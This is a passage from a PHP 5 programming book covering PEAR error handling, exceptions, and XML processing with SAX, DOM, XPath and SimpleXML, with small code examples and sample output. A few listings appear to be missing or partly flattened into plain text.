The error code is a simple integer value representing the nature of the error. Some PEAR error-based mechanisms (such as the one in PEAR DB) use this parameter as the primary way of describing the nature of errors, and leave the message for a plain code to text mapping. Error codes are also good in conjunction with localized error messages, because they provide a language-neutral description of errors. It is good practice to always specify an error code, if nothing else to allow for cleaner, more graceful error handling.

int $mode (default PEAR_ERROR_RETURN)
This is the error mode that will be applied to this error. It may have one of the following values:

☞ PEAR_ERROR_RETURN
☞ PEAR_ERROR_PRINT
☞ PEAR_ERROR_DIE
☞ PEAR_ERROR_TRIGGER
☞ PEAR_ERROR_CALLBACK

The meaning of the different error modes is discussed in the following "Handling PEAR Errors" section.

mixed $options
This parameter is used differently depending on what error mode was specified:

☞ For PEAR_ERROR_PRINT and PEAR_ERROR_DIE, the $options parameter contains a printf format string that is used when printing the error message.
☞ For PEAR_ERROR_TRIGGER, it contains the PHP error level used when triggering the error. The default error level is E_USER_NOTICE, but it may also be set to E_USER_WARNING or E_USER_ERROR.
☞ Finally, if $mode is PEAR_ERROR_CALLBACK, the $options parameter is the callable that will be given the error object as its only parameter. A callable is either a string with a function name, an array of class name and method name (for static method calls), or an array with an object handle and method name (object method calls).

string $userinfo
This variable holds extra information about the error. An example of content would be the SQL query for failing database calls, or the filename for failing file operations. This member variable containing user info may be appended to with the addUserInfo() method.

7.3.1.2 PEAR_Error::addUserInfo()
void addUserInfo(string info)
This method appends info to the error's user info. It uses the character sequence " ** " to separate different user info entries.

7.3.1.3 PEAR_Error::getBacktrace()
array getBacktrace([int frame])
This method returns a function call backtrace as returned by debug_backtrace() from the PEAR_Error constructor. Because PEAR_Error saves the backtrace before raising the error, using exceptions through PEAR errors will preserve the backtrace. The optional integer argument is used to select a single frame from the backtrace, with index 0 being the innermost frame (frame 0 will always be in the PEAR_Error class).

7.3.1.4 PEAR_Error::getCallback()
mixed getCallback()
This method returns the "callable" used in the PEAR_ERROR_CALLBACK error mode.

7.3.1.5 PEAR_Error::getCode()
int getCode()
This method returns the error code.

7.3.1.6 PEAR_Error::getMessage()
string getMessage()
This method returns the error message.

7.3.1.7 PEAR_Error::getMode()
int getMode()
This method returns the error mode (PEAR_ERROR_RETURN and so on).

7.3.1.8 PEAR_Error::getType()
string getType()
This method returns the type of PEAR error, which is the lowercased class name of the error class. In most cases, the type will be pear_error (in lowercase), but it varies for packages that implement their own error-handling classes inheriting PEAR_Error.

7.3.1.9 PEAR_Error::getUserInfo()
string getUserInfo()
This method returns the entire user info string. Different entries are separated with the string " ** " (space, two asterisks, space).

7.3.2 Handling PEAR Errors

The default behavior for PEAR errors is to do nothing but return the object. However, it is possible to set an error mode that will be used for all subsequent errors raised. The error mode is checked when the PEAR_Error object is created, and is expressed by a constant:

The previous example is simplified here by using a global default error handler that applies to every PEAR error that has no other error mode configured. In this case, we use PEAR_ERROR_DIE, which prints the error message using the parameter as printf format string, and then dies. The advantage of this approach is that you can code without checking errors for everything. It is not very graceful, but as you will see later in the chapter, you may also apply temporary error modes during operations that need more graceful handling.

7.3.2.1 PEAR::setErrorHandling()
void PEAR::setErrorHandling(int mode, [mixed options])

This method sets up default error-handling parameters, globally or for individual objects. Called statically, it sets up global error handling defaults:

    PEAR::setErrorHandling(PEAR_ERROR_TRIGGER);

Here, we set the global default error handling to PEAR_ERROR_TRIGGER, which makes all PEAR errors trigger PHP errors.

Called when part of an object, this method sets up error-handling defaults for that object only:

    $dbh->setErrorHandling(PEAR_ERROR_CALLBACK, 'my_error_handler');

In this example, we set the defaults so every error object raised from within the $dbh object is passed as a parameter to my_error_handler().

7.3.3 PEAR Error Modes

7.3.3.1 PEAR_ERROR_RETURN
This default error mode does nothing beyond creating the error object and returning it.

7.3.3.2 PEAR_ERROR_PRINT
In this mode, the error object automatically prints the error message to PHP's output stream. You may specify a printf format string as a parameter to this error mode; we will look at that later in this chapter.

7.3.3.3 PEAR_ERROR_DIE
This mode does the same thing as PEAR_ERROR_PRINT, except it exits after displaying the error message. The printf format string is still applied.

7.3.3.4 PEAR_ERROR_TRIGGER
The trigger mode passes the error message on to PHP's built-in trigger_error() function. This mode also takes an optional parameter, which is the PHP error level used in the trigger_error() call (one of E_USER_NOTICE, E_USER_WARNING, and E_USER_ERROR). Wrapping PHP errors inside PEAR errors may be useful, for example, if you want to exploit the flexibility of PEAR errors while keeping all the built-in logging capabilities of PHP's own error handling.

7.3.3.5 PEAR_ERROR_CALLBACK
Finally, if none of the preceding error modes suits your needs, you may set up an error-handling function and do the rest yourself.

7.3.4 Graceful Handling

7.3.4.1 PEAR::pushErrorHandling()
bool PEAR::pushErrorHandling(int mode, [mixed options])

This method pushes another error-handling mode on top of the default handler stack. This error mode will be used until popErrorHandling() is called. You may call this method statically or in an object context. As with other methods that have this duality, global defaults are used when called statically, and the object defaults when in an object context.

Here is an extended version of the first example. After connecting, we insert some data into a table, and handle duplicate keys gracefully:

    ...
    // temporarily set the global default error handler
    PEAR::pushErrorHandling(PEAR_ERROR_RETURN);
    $res = $dbh->query("INSERT INTO mytable VALUES(1, 2, 3)");
    // PEAR_ERROR_DIE is once again the active error handler
    PEAR::popErrorHandling();
    if (PEAR::isError($res)) {
        // duplicate keys will return this error code in PEAR DB:
        if ($res->getCode() == DB_ERROR_ALREADY_EXISTS) {
            print "Duplicate record!\n";
        } else {
            PEAR::throwError($res);
        }
    }
    ?>

First, we set up a default error handler that prints the error message and exits. After successfully connecting to the database (the default error handler will make the script exit if the connection fails), we push PEAR_ERROR_RETURN as the global default error mode while executing a query that may return an error. Once the query is done, we pop away the temporary error mode. If the query returned an error, we check the error code to see if it is a situation we know how to handle. If it was not, we re-throw the error, which causes the original global defaults (PEAR_ERROR_DIE) to apply.

7.3.4.2 PEAR::popErrorHandling()
bool PEAR::popErrorHandling()

This is the complementary method to PEAR::pushErrorHandling() and will pop (remove) the topmost mode from the error handling stack. It may be called statically or in an object context, as with pushErrorHandling().

7.3.4.3 PEAR::expectError()
int expectError(mixed expect)

This method is a more specific approach to the same problem that pushErrorHandling() tries to solve: making an exception (in the traditional sense of the word) for errors we want to handle differently. The expectError() approach is to look for one or more specified error codes or error messages, and force the error mode to PEAR_ERROR_RETURN for matching errors, thus disabling any handlers.

If the expect parameter is an integer, it is compared to the error code of the raised error. If they match, any specified error handler is disabled, and the error object is silently returned.

If expect is a string, the same thing is done with the error message, and as a special case the string "*" matches every error message. Thus, expectError('*') has the same effect as pushErrorHandling(PEAR_ERROR_RETURN).

Finally, if expect is an array, the previous rules are applied to each element, and if one matches, the error object is just silently returned.
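The three matching rules for the expect parameter can be written down as a small function. This is an illustration of the rules as described above, not PEAR's actual implementation; the function name sketch_expect_matches() and the sample code value are hypothetical.

```php
<?php
// Illustration only: mirrors the matching rules described in the
// text; it is not taken from PEAR's source.
function sketch_expect_matches($expect, $code, $message)
{
    if (is_array($expect)) {
        // An array matches if any one of its elements matches
        foreach ($expect as $one) {
            if (sketch_expect_matches($one, $code, $message)) {
                return true;
            }
        }
        return false;
    }
    if (is_int($expect)) {
        // Integers are compared to the error code
        return $expect === $code;
    }
    if (is_string($expect)) {
        // Strings are compared to the message; "*" matches anything
        return $expect === '*' || $expect === $message;
    }
    return false;
}

// Hypothetical error code and message, for demonstration only
$code = -5;
$message = 'already exists';

var_dump(sketch_expect_matches(-5, $code, $message));
var_dump(sketch_expect_matches(array(-3, 'no such table'), $code, $message));
?>
```

A matching error would then be returned silently, as with PEAR_ERROR_RETURN, while a non-matching error would go through whatever handler is configured.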

The return value is the new depth of the object's expect stack (or the global expect stack if called statically).

Let's repeat the last example using expectError() instead of pushErrorHandling():

    ...expectError(DB_ERROR_ALREADY_EXISTS);
    $res = $dbh->query("INSERT INTO mytable VALUES(1, 2, 3)");
    // back to PEAR_ERROR_DIE again:
    $dbh->popExpect();
    if (PEAR::isError($res) && $res->getCode() == DB_ERROR_ALREADY_EXISTS) {
        print "Duplicate record!\n";
    }
    ?>

In this example, we use the per-object default error handling in the $dbh object instead of the global default handler to implement our graceful duplicate handling. The main difference from the pushErrorHandling() approach is that we don't have to re-throw/raise the error, because our "duplicate handling code" is called only if a duplicate error occurred, and not if any error occurred, as would have been the case with pushErrorHandling().

7.3.4.4 PEAR::popExpect()
array popExpect()

This method complements expectError(), and removes the topmost element in the expect stack. As with the other error-handling methods, it applies to object or global defaults depending on whether it is called statically or in an object context. The return value is an array with the expected error codes/messages that were popped off the expect stack.

7.3.4.5 PEAR::delExpect()
bool delExpect(mixed error_code)

This method removes error_code from every level in the expect stack, returning true if anything was removed.

7.4 EXCEPTIONS

7.4.1 What Are Exceptions?

Exceptions are a high-level built-in error mechanism that is new as of PHP 5. Just as for PEAR errors, the relative cost of generating exceptions is high, so use them only to notify about unexpected events.

Exceptions are objects that you can "throw" to PHP. If something is ready to "catch" your exception, it is handled gracefully. If nothing catches your exception, PHP bails out with an error message like this:

    Fatal error: Uncaught exception 'FileException' with message 'Could not open config /home/ssb/foo/conf/my.conf' in .../My/Config.php:49
    Stack trace:
    #0 .../My/Config.php(31): config->parseFile('my.conf')
    #1 .../My/prepend.inc(61): config->__construct('my.conf')
    #2 {main}
      thrown in .../My/Config.php on line 49

Although PEAR errors are loosely modeled after exceptions, they lack the execution control that exceptions provide. With PEAR errors, you always need to check if a return value is an error object; otherwise the error does not propagate back to the original caller. With exceptions, only code that cares about a particular exception needs to check for (catch) exceptions.

7.4.2 try, catch, and throw

Three language constructs are used by exceptions: try, catch, and throw.

To handle an exception, you need to run some code inside a try block, like this:

    try {
        $article->display();
    }

The try block instructs PHP to look out for exceptions generated as the code inside the block is executed. If an exception occurs, it is passed on to one or more catch blocks immediately following the try block:

    catch (Exception $e) {
        die($e->getMessage());
    }

As you can see, the variable $e seems to contain an object. It does: exceptions are actually objects, and the only requirement is that the object must be an instance of, or inherit from, the Exception class. The Exception class implements a few methods, such as getMessage(), that give you more details about the origin and cause of the exception. See Chapter 3, "PHP 5 OO Language," for details on the Exception class.

To generate an exception in your own code, use the throw statement:

    $fp = @fopen($filename, "r");
    if (!is_resource($fp)) {
        throw new FileException("could not read '$filename'");
    }
    while ($line = fgets($fp)) {
        ...

In the previous catch example, you saw that the exception was an object. This example creates that object. There is nothing magical about this syntax; throw simply uses the specified object as part of the exception.

To semantically separate various types of exceptions, you can define subclasses of Exception as you see fit:

    class IO_Exception extends Exception { }
    class XML_Parser_Exception extends Exception { }
    class File_Exception extends IO_Exception { }

No member variables or methods are required in the exception class; everything that you need is already defined in the built-in Exception class.

PHP checks the class names in the catch statement against the exception object with a so-called is_a comparison. That is, if the exception object is an instance of the catch class, or an instance of a subclass, PHP executes the catch block. Here is an example:

    try {
        $article->display();
    }
    catch (IO_Exception $e) {
        print "Some IO problem occurred!";
    }
    catch (XML_Parser_Exception $e) {
        print "Bad XML input!";
    }

Here, the IO_Exception catch catches both IO_Exception and File_Exception, because File_Exception inherits IO_Exception.

If every catch fails to capture the exception, the exception goes on to the calling function, giving the calling function the opportunity to catch it.

If the exception is not caught anywhere, PHP offers a last chance: the exception-handling function. By default, PHP prints the error message, class name, and a backtrace. By calling set_exception_handler(), you can replace this built-in behavior:
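A minimal sketch of both ideas follows: catch blocks matched against a class hierarchy, and a replacement for the default uncaught-exception output. The class names come from the text; the function names which_catch(), describe_uncaught(), and sketch_exception_handler() and the wording of the printed message are assumptions made for this illustration.

```php
<?php
class IO_Exception extends Exception { }
class File_Exception extends IO_Exception { }

// Shows which catch block PHP selects for a given exception object
function which_catch($e)
{
    try {
        throw $e;
    } catch (IO_Exception $caught) {
        // Also reached for File_Exception, a subclass of IO_Exception
        return 'IO_Exception block';
    } catch (Exception $caught) {
        return 'Exception block';
    }
}

// Hypothetical formatter used by the handler below
function describe_uncaught($e)
{
    return get_class($e) . ': ' . $e->getMessage();
}

// Called by PHP for any exception that no catch block captured
function sketch_exception_handler($e)
{
    print "Sorry, something went wrong (" . describe_uncaught($e) . ")\n";
}

set_exception_handler('sketch_exception_handler');

print which_catch(new File_Exception('could not read file')) . "\n";
?>
```

After the handler has run for an uncaught exception, the script still terminates, so the handler is a place for reporting rather than recovery.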

CHAPTER 8
XML with PHP 5

8.1 INTRODUCTION

XML is gaining more momentum as a universal language for communication between platforms; some people even call it the "new web revolution." XML is sometimes used as a database for storing documents, but data storage was never its primary purpose. It was developed to pass information from one system to another in a common format. XML is a tagged language. The actual data is contained in structured, tagged elements of the document. The XML document must be parsed to extract the information. Often, the information needs to be converted into another format. In this chapter, we focus on using PHP to read and transform XML documents and to use XML as a communication protocol with remote services. Providing all techniques for using XML is beyond the scope of this book.

After you finish reading this chapter, you will have learned

☞ The structure of an XML document
☞ The terminology needed to work with XML documents
☞ How to parse an XML file using the two mainstream methods: SAX and DOM
☞ How to parse a simple XML file an easier way: the PHP SimpleXML extension
☞ How to use some useful PEAR packages for XML
☞ How to convert an XML document into another format using XSLT
☞ How to share information between systems using XML

8.2 VOCABULARY

When working with XML documents, you will encounter several terms that might be unfamiliar. The following example shows an XML document that is an XHTML document:

    <?xml version="1.0" encoding="..."?>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
     <head>
      <title>XML Example</title>
     </head>
     <body background="bg.png">
      <p>
       Moved to <a href="http://example.org/">example.org</a>.
       <br />
       foo &amp; bar
      </p>
     </body>
    </html>

The first line is the XML declaration; it specifies the XML version and the encoding of the file. The next line is the DOCTYPE declaration. In this case, the DOCTYPE specifies that the root tag in the XML document is html, that the document type is PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN", and that a DTD (Document Type Definition) for this type of document can be found at http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd.

A DTD file describes the structure of a document type. Validating parsers can use the DTD file to see whether the XML file being parsed is a valid XML file in relation to the given DTD. Not all parsers are validating parsers; some only care that the document is well-formed. A well-formed document conforms to the XML standard (for example, all elements in the document follow the XML specifications). A valid XML document conforms to the DTD associated with the document type, as well as to the XML specifications. To check whether an XHTML (or HTML) document is valid according to the specified document type, you can use the validator available online at http://validator.w3.org.

The rest of the document consists of the content itself, starting with the root node (also called root element):

    <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

According to the XHTML 1.0 Transitional DTD, the root element (html) must contain an xmlns declaration for the XHTML namespace. A namespace provides a means of mixing two separate document types into one XML document, such as embedding MathML into XHTML.

The child elements of the root node follow:

     <head>
      <title>XML Example</title>
     </head>
     <body background="bg.png">
      <p>
       Moved to <a href="http://example.org/">example.org</a>.
       <br />
       foo &amp; bar
      </p>
     </body>

The head tags (<head> and </head>) enclose the nested title tag that specifies the title XML Example. The body tag includes the background attribute. Attributes contain extra information about a specific tag. XML standards require all attributes to have a value; an attribute that has no value is not allowed. Values for attributes must be enclosed with single or double quotes. Using one quoting style throughout your document is recommended but not required. In this case, background specifies a background picture.

All opening tags, such as <p>, need a matching closing tag, such as </p>. For elements that have no content, you can merge the opening and closing tag. Instead of using <br></br> in your document, you can use <br/>. Because some browsers may have problems parsing <br/>, add a space before the /, so that the resulting tag is <br />.

Some special characters cause problems in XML documents. For example, < and > are used for tags, so if you use < or > in an XML document, the character is treated as part of a tag. Entities were developed to enable you to use special characters in your document without confusing XML. Entities are character combinations, beginning with an ampersand (&) and ending with a semicolon (;), that you can use in your document instead of special characters. The entity is recognized correctly and not treated as a special character. For instance, you can use &lt; to represent < and &gt; to represent >. When you use the entities, the characters are included in your document correctly and not treated as tags. Entities are also used to input non-ASCII characters into your XML file, for example, ë or €. The entities for these two symbols are &euml; and &euro;. For a fairly complete list of entities, see http://www.w3.org/TR/REC-html40/sgml/entities.html. If you want to use the & character itself, of course, you need to use an entity, &amp;, as shown in the example XML file.

8.3 PARSING XML

Two techniques are used for parsing XML documents in PHP: SAX (Simple API for XML) and DOM (Document Object Model). By using SAX, the parser goes through your document and fires events for every start and stop tag or other element found in your XML document. You decide how to deal with the generated events. By using DOM, the whole XML file is parsed into a tree that you can walk through using functions from PHP. PHP 5 provides another way of parsing XML: the SimpleXML extension. But first, we explore the two mainstream methods.

8.3.1 SAX

We now leave the somewhat boring theory behind and start with an example. Here, we're parsing the example XHTML file we saw earlier. We do that by using the XML functions available in PHP (http://php.net/xml). First, we create a parser object:

    $xml = xml_parser_create('UTF-8');

The optional parameter, 'UTF-8', denotes the encoding to use while parsing. When this function executes successfully, it returns an XML parser handle for use with all the other XML parsing functions.

Because SAX works by handling events, you need to set up the handlers. In this basic example, we focus on the two most important handlers: one for start and end tags, and one for character data (content):

    xml_set_element_handler($xml, 'start_handler', 'end_handler');
    xml_set_character_data_handler($xml, 'character_handler');

These statements set up the handlers, but they must be implemented before any actions occur. Let's look at how the handler functions should be implemented.
In the previous statement, the start_handler is passed three parameters: the XML parser object, the name of the tag, and an associative array containing the attributes defined for the tag.

    function start_handler ($xml, $tag, $attributes)
    {
        global $level;

        echo "\n". str_repeat(' ', $level). ">>>$tag";
        foreach ($attributes as $key => $value) {
            echo " $key $value";
        }
        $level++;
    }

The tag name is passed with all characters uppercased if case folding is enabled (the default). You can turn off this behavior by setting an option on the XML parser object, as follows:

    xml_parser_set_option($xml, XML_OPTION_CASE_FOLDING, false);

The end handler is not passed the attributes array, only the XML parser object and the tag name:

    function end_handler ($xml, $tag)
    {
        global $level;

        $level--;
        echo str_repeat(' ', $level). "<<<$tag";
    }

To make our test script work, we need to implement the character handler to show all content. We wrap the text in this handler so that it fits nicely on our terminal screen:

    function character_handler ($xml, $data)
    {
        global $level;

        // explode() replaces the original split(), which newer PHP versions no longer provide
        $data = explode("\n", wordwrap($data, 76 - ($level * 2)));
        foreach ($data as $line) {
            echo str_repeat(' ', ($level + 1)). $line. "\n";
        }
    }

After we implement all the handlers, we can start parsing our XML file:

    xml_parse($xml, file_get_contents('test1.xhtml'));
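As a separate, self-contained sketch of the same event flow, the function below collects SAX events into an array instead of printing them, and parses a string rather than a file so that it can be run as is. The function name sax_events() and the sample markup are assumptions for this illustration, and the anonymous functions used as handlers require PHP 5.3 or later.

```php
<?php
// Hypothetical helper: returns the list of SAX events for a document,
// or false if the document is not well-formed.
function sax_events($xml_text)
{
    $events = array();
    $parser = xml_parser_create('UTF-8');

    // Keep tag names as written instead of uppercasing them
    xml_parser_set_option($parser, XML_OPTION_CASE_FOLDING, false);

    xml_set_element_handler(
        $parser,
        function ($p, $tag, $attributes) use (&$events) {
            $events[] = "start $tag";
        },
        function ($p, $tag) use (&$events) {
            $events[] = "end $tag";
        }
    );
    xml_set_character_data_handler(
        $parser,
        function ($p, $data) use (&$events) {
            // Ignore chunks that consist of whitespace only
            if (trim($data) !== '') {
                $events[] = 'text ' . trim($data);
            }
        }
    );

    // The third argument marks this as the final piece of data
    $ok = xml_parse($parser, $xml_text, true);
    return $ok ? $events : false;
}

$doc = '<p>Moved to <a href="http://example.org/">example.org</a>.</p>';
print_r(sax_events($doc));
?>
```

Returning the events rather than echoing them keeps the handlers free of global state, at the cost of holding the whole event list in memory.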

The first part of the output of our script looks like this:

    >>>HTML XMLNS='http://www.w3.org/1999/xhtml' XML:LANG='en' LANG='en'
      ||
      ||
      | |
     >>>HEAD
       ||
       ||
       | |
      >>>TITLE
        |XML Example|
      <<<TITLE

    function flush_data ()
    {
        global $level, $char_data;

        /* Trim data and dump it when there is data */
        $char_data = trim($char_data);
        if (strlen($char_data) > 0) {
            echo "\n";
            // Wrap it nicely, so that it fits on a terminal screen
            $data = explode("\n", wordwrap($char_data, 76 - ($level * 2)));
            foreach ($data as $line) {
                echo str_repeat(' ', ($level + 1))."[".$line."]\n";
            }
        }

        /* Clear the data in the buffer */
        $char_data = '';
    }

    /*
     * Handler for start tags
     */
    function start_handler ($xml, $tag, $attributes)
    {
        global $level;

        /* Flush collected data from the character handler */
        flush_data();

        /* Dump attributes as a string */
        echo "\n". str_repeat(' ', $level). "$tag";
        foreach ($attributes as $key => $value) {
            echo " $key='$value'";
        }

        /* Increase indentation level */
        $level++;
    }

    function end_handler ($xml, $tag)
    {
        global $level;

        /* Flush collected data from the character handler */
        flush_data();

        /* Decrease indentation level and print end tag */
        $level--;
        echo "\n". str_repeat(' ', $level). "/$tag";
    }

    function character_handler ($xml, $data)
    {
        global $level, $char_data;

        /* Add the character data to the buffer */
        $char_data .= ' '. $data;
    }
    ?>

The output looks more decent, of course:

    HTML XMLNS='http://www.w3.org/1999/xhtml' XML:LANG='en' LANG='en'
     HEAD
      TITLE
        [XML Example]
      /TITLE
     /HEAD
     BODY BACKGROUND='bg.png'
      P
        [Moved to]
       A HREF='http://example.org/'
         [example.org]
       /A
        [.]
       BR
       /BR
        [foo & bar]
      /P
     /BODY
    /HTML

8.3.2 DOM

Parsing a simple X(HT)ML file with a SAX parser is a lot of work. Using the DOM (http://www.w3.org/TR/DOM-Level-3-Core/) method is much easier, but you pay a price: memory usage. Although it might not be noticeable in our small example, it’s definitely noticeable when you parse a 20MB XML file with the DOM method. Rather than firing events for every element in the XML file, DOM creates a tree in memory containing your XML file. Figure 8.1 shows the DOM tree that represents the file from the previous section.

Fig. 8.1 DOM tree. (The figure shows the root node, the document type, and the nested html, head, title, body, p, a, and br elements with their attributes and text content.)

We can show all the content without tags by walking through the tree of objects. We do so in this example by recursively going over all node children:

     1 <?php
     2 $dom = new DomDocument();
     3 $dom->load('test2.xml');
     4 $root = $dom->documentElement;
     5
     6 process_children($root);
     7
     8 function process_children($node)
     9 {
    10     $children = $node->childNodes;
    11
    12     foreach ($children as $elem) {
    13         if ($elem->nodeType == XML_TEXT_NODE) {
    14             if (strlen(trim($elem->nodeValue))) {
    15                 echo trim($elem->nodeValue)."\n";
    16             }
    17         } else if ($elem->nodeType == XML_ELEMENT_NODE) {
    18             process_children($elem);
    19         }
    20     }
    21 }
    22 ?>

The output is the following:

    XML Example
    Moved to
    example.org
    .
    foo & bar

The example shows some very simple DOM processing. We only read properties of the node objects and do not call any of their methods. In line 4, we retrieve the root element of the DOM document that was loaded in line 3.
For every element we encounter, we call process_children() (in lines 6 and 18), which iterates over the list of child nodes (line 12). If the node is a text node, we echo its value (lines 13–16), and if it’s an element, we call process_children() recursively (lines 17–18).

The DOM extension is more powerful than what is shown in this example. It implements almost all the functionality described in the DOM2 specification. The following example uses the getAttributeNode() method of the DomElement class to return the background attribute of the body tag:

    <?php
    $dom = new DomDocument();
    $dom->load('test2.xml');
    $root = $dom->documentElement;

    process_children($root);

    function process_children($node)
    {
        $children = $node->childNodes;

        foreach ($children as $elem) {
            if ($elem->nodeType == XML_ELEMENT_NODE) {
                if ($elem->nodeName == 'body') {
                    echo $elem->getAttributeNode('background')->value. "\n";
                }
                process_children($elem);
            }
        }
    }
    ?>

We still need to recursively search through the tree to find the correct element, but because we know about the structure of the document, we can simplify the example:

    1 <?php
    2 $dom = new DomDocument();
    3 $dom->load('test2.xml');
    4 $body = $dom->documentElement->getElementsByTagName('body')->item(0);
    5 echo $body->getAttributeNode('background')->value. "\n";
    6 ?>

Line 4 is the main processing line. First, we request the documentElement of the DOM document, which is the root node of the DOM tree. From that element, we request all descendant elements with tag name body by using getElementsByTagName. Then, we take the first item in the list (because we know that the first body tag in the file is the correct one). In line 5, we request the background attribute with getAttributeNode, and display its value by reading the value property.
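The same lookup can be tried without test2.xml on disk. The following is a minimal sketch, assuming an inline document of our own making in place of the example file; loadXML(), getAttribute(), and textContent are standard parts of the DOM extension, while the markup and variable names are illustrative.

```php
<?php
// The inline markup is an assumption standing in for test2.xml.
$source = '<html><head><title>XML Example</title></head>'
        . '<body background="bg.png"><p>Moved to '
        . '<a href="http://example.org/">example.org</a>.</p></body></html>';

$dom = new DOMDocument();
$dom->loadXML($source);

// getElementsByTagName() searches all descendants, not only direct children.
$body = $dom->documentElement->getElementsByTagName('body')->item(0);

// getAttribute() returns the attribute value directly as a string, a shorter
// alternative to getAttributeNode('background')->value.
$background = $body->getAttribute('background');

// textContent concatenates the text of a node and all of its descendants.
$paragraph = $body->getElementsByTagName('p')->item(0)->textContent;

echo $background, "\n";
echo $paragraph, "\n";
```

Reading textContent is a shortcut for the recursive walk shown earlier when only the combined text of a subtree is needed.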
8.3.2.1 Using XPath

By using XPath, we can further simplify the previous example. XPath is a query language for XML documents, and it is also used in XSLT for matching nodes. We can use XPath to query a DOM document for certain nodes and attributes, similar to using SQL to query a database:

    <?php
    $dom = new DomDocument();
    $dom->load('test2.xml');
    $xpath = new DomXPath($dom);
    $nodes = $xpath->query("*[local-name()='body']", $dom->documentElement);
    echo $nodes->item(0)->getAttributeNode('background')->value. "\n";
    ?>

8.3.2.2 Creating a DOM Tree

The DOM extension can do more than parse XML. It can create an XML document from scratch. In your script, you can build a tree of objects that you can dump to disk as an XML file. This ideal way to write XML files is not easy to do from within a script, but we’re going to do it anyway.

In this example, we create a file with content similar to that shown in the example XML file we used in the previous section. We cannot guarantee that the file will be exactly the same because the DOM extension might not handle the whitespace in the XML file as cleanly as a human would. Let’s start by creating the DOM object and the root node:

    <?php
    $dom = new DomDocument();

    $html = $dom->createElement('html');
    $html->setAttribute("xmlns", "http://www.w3.org/1999/xhtml");
    $html->setAttribute("xml:lang", "en");
    $html->setAttribute("lang", "en");
    $dom->appendChild($html);

First, a DomDocument object is created with new DomDocument(). All elements are created by calling the createElement() method of the DomDocument class, or createTextNode() for text nodes. The name of the element, in this case html, is passed to the method, and an object of the type DomElement is returned. The returned object is used to add attributes to the element.
After the DomElement has been created, we add it to the DomDocument by calling the appendChild() method. Then, we add the head element to the html element and a title element to the head element:

    $head = $dom->createElement('head');
    $html->appendChild($head);

    $title = $dom->createElement('title');
    $title->appendChild($dom->createTextNode("XML Example"));
    $head->appendChild($title);

As before, we first create a DomElement object (for example, head) by calling the createElement() method of the DomDocument object, and then we add the newly created object to the existing DomElement object (for example, $html) with appendChild(). We then add the body element with its background attribute. Then, we add the 'p' element, which contains the main content of our X(HT)ML document, as a child of the body element:

    /* Create the body element */
    $body = $dom->createElement('body');
    $body->setAttribute("background", "bg.png");
    $html->appendChild($body);

    /* Create the p element */
    $p = $dom->createElement('p');
    $body->appendChild($p);

The contents of our <p> element are more complicated. It consists (in order) of a text element ("Moved to "), an <a> element, another text element (our dot), the <br> element, and finally, a third text element ("foo & bar"):

    /* Add the "Moved to" */
    $text = $dom->createTextNode("Moved to ");
    $p->appendChild($text);

    /* Add the a */
    $a = $dom->createElement('a');
    $a->setAttribute("href", "http://example.org/");
    $a->appendChild($dom->createTextNode("example.org"));
    $p->appendChild($a);

    /* Add the ".", br and "foo & bar" */
    $text = $dom->createTextNode(".");
    $p->appendChild($text);

    $br = $dom->createElement('br');
    $p->appendChild($br);

    $text = $dom->createTextNode("foo & bar");
    $p->appendChild($text);

When we’re finished creating the DOM of our X(HT)ML document, we echo it to the screen:

    echo $dom->saveXML();
    ?>

The output resembles our original document, but without some of the whitespace (which is added here for readability):

    <?xml version="1.0"?>
    <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
     <head>
      <title>XML Example</title>
     </head>
     <body background="bg.png">
      <p>
       Moved to <a href="http://example.org/">example.org</a>.<br/>
       foo &amp; bar
      </p>
     </body>
    </html>
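A tree built this way can be checked by querying it again. The sketch below is a reduced version of the example under our own assumptions: it builds only the body, p, and a elements, leaves out the xmlns attribute so that the XPath expressions need no namespace handling, and reads the result back with the DomXPath class from section 8.3.2.1.

```php
<?php
$dom = new DOMDocument();

// Build html > body[background] > p > a, as in the walkthrough above, but
// without the head element and the namespace attribute (our simplification).
$html = $dom->createElement('html');
$dom->appendChild($html);

$body = $dom->createElement('body');
$body->setAttribute('background', 'bg.png');
$html->appendChild($body);

$p = $dom->createElement('p');
$body->appendChild($p);
$p->appendChild($dom->createTextNode('Moved to '));

$a = $dom->createElement('a');
$a->setAttribute('href', 'http://example.org/');
$a->appendChild($dom->createTextNode('example.org'));
$p->appendChild($a);

// Text nodes are escaped on output, so the ampersand needs no entity here.
$p->appendChild($dom->createTextNode(' foo & bar'));

// Query the freshly built tree instead of walking it by hand.
$xpath = new DOMXPath($dom);
$href = $xpath->query('/html/body/p/a/@href')->item(0)->value;
$background = $xpath->query('/html/body')->item(0)->getAttribute('background');

echo $dom->saveXML();
```

Querying the in-memory tree before writing it out is a cheap way to confirm that elements and attributes ended up where they were intended.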

8.4 SIMPLEXML

The SimpleXML extension, enabled by default in PHP 5, is the easiest way to work with XML. You don’t need to remember a difficult DOM API. You just access the XML through a data structure representation. Here are its four simple rules:

1. Properties denote element iterators.
2. Numeric indices denote elements.
3. Non-numeric indices denote attributes.
4. String conversion allows access to TEXT data.

By using these four rules, you can access all the data from an XML file.

8.4.1 Creating a SimpleXML Object

You can create a SimpleXML object in any of three ways, as shown in this example:

XML Example

Moved to example.org.

 foo 

Moved to example.org.

    XML;
    $sx2 = simplexml_load_string($string);
    $sx3 = simplexml_load_dom(new DomDocument());
    ?>

In the first method, simplexml_load_file() opens the specified file and parses it into memory. In the second method, $string is created and passed to the function simplexml_load_string(). In the third method, simplexml_load_dom() imports a DomDocument created with the DOM functions in PHP. In all three cases, a SimpleXML object is returned.

The simplexml_load_dom() function in the SimpleXML extension has a brother in the DOM extension, called dom_import_simplexml(). These related functions allow

you to share the same XML structure between both extensions. You can, for example, modify simple documents with SimpleXML and more complicated ones with DOM.

8.4.2 Browsing SimpleXML Objects

The first rule is “Properties denote element iterators,” which means that you can loop over all <p> tags in the <body>, like this:

    <?php
    foreach ($sx2->body->p as $p) {
    }
    ?>

The second rule states “Numeric indices denote elements,” which means that we can access the second <p> tag with

    <?php
    $sx2->body->p[1];
    ?>

The third rule is “Non-numeric indices denote attributes,” which means that we can access the background attribute of the body tag with

    <?php
    $sx2->body['background'];
    ?>

